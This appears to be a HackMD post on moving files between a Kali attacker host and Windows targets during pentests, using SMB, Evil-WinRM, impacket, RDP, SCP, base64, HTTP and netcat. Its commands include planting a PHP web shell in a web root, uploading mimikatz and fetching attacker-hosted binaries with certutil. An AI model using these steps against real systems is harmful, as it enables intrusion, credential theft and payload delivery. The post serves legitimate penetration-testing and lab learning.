Try   HackMD

File Transfer Tricks (Windows - Kali Linux)

Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host.

Using SMB

With impacket we can use the utility impacket-smbserver to start an SMB server and use it to transfer files from windows.

On Kali Host

impacket-smbserver test . -smb2support -username jojomojo -password jojomojo

On Windows



net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo
copy backup.zip m:\

Replace YOUR_KALI_IP with your Kali Linux host's IP.

Using Evil-WinRM

Evil-WinRM has built-in commands known as upload and download which can be used to upload and download files respectively.

Uploading Files To Windows



upload /path/to/sourcefile C:\path\to\destinationfile
upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe

Downloading Files From Windows



download C:\path\to\sourcefile /path/to/destinationfile
download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip

Using Impacket Utilities

Some of the impacket utilities such as impacket-psexec, impacket-wmiexec, impacket-smbexec have built-in commands such as lput and lget that can be used to upload and download a file.

Uploading A File To Windows

A file that is uploaded with this command, will be uploaded to the *C:\Windows* directory.






C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe

Downloading A File From Windows



C:\Windows> lget mimikatz.log
[*] Downloading ADMIN$\mimikatz.log

Using RDP

If the windows machine has a RDP port open, we can mount shared folders and copy files.

On Kali Host

rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir

On Windows

copy mimikatz.log \\tsclient\test\mimikatz.log

Using SSH (SCP)

SCP can be useful especially when transferring large files.

Uploading A File To Windows

scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe'

Downloading A File From Windows

scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/

Using Base64

Base64 encoding/decoding can be used as a way to transfer files from/to windows.

Transferring File From Kali Linux To Windows

On Kali Host

Contents of webshell.php

└─$ cat webshell.php
<?php echo shell_exec($_GET['cmd']); ?>

Encoding the content of webshell.php, you can use either one of these commands to encode the webshell to base64, then copy the output.






└─$ base64 -w0 <<< cat webshell.php
└─$ cat webshell.php | base64 -w0

# output
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==
On Windows (Powershell)
PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php
On Windows (certutil.exe)


C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc
C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php

Using HTTP

On Kali Host

Run any of the commands below to start a HTTP webserver



python3 -m http.server 80
python2 -m SimpleHTTPServer 80

On Windows

With certutil.exe
certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe
With curl.exe
curl -s -O http://192.168.1.102/test.exe
With wget.exe
wget -o bad.exe http://192.168.1.102/test.exe
With iwr Powershell


Invoke-WebRequest -Uri "https://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe"
iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe"

Using Netcat (nc)

On kali host

nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe

On Windows

C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe

Although there are more methods/techniques used to transfer files, the few mentioned above are most used methods in common pentesting scenarios allowing you to easily transfer files from windows to your kali linux host.

Last changed by 
 
Tahaa Farooq
SM @ OffSec | γŠε‰γ―γ‚‚γ†ζ­»γ‚“γ§γ„γ‚‹
0
1350

Read more

Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user β€œguest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
Introduction To CryptoHack - Writeup

This starter course gets you up and running with CryptoHack. You&#39;ll learn to encode and decode data types that are commonly used in cryptography. Then you&#39;ll get comfortable with the XOR operation which is at the centre of symmetric cryptography. Finally, the course ends with some fun XOR puzzles to test what you&#39;ve learned.

Nov 7, 2024
An Operative Guide To Pentesting The MySQL Service

In this article, I will be writing about how you, as a penetration tester, can leverage access to a MySQL service to gain complete access to the server, read files from the server, and write files to the server. This is achieved by identifying common misconfigurations and settings and exploiting them to achieve the intended goal.

Sep 11, 2024
Read more from Tahaa Farooq
Published on HackMD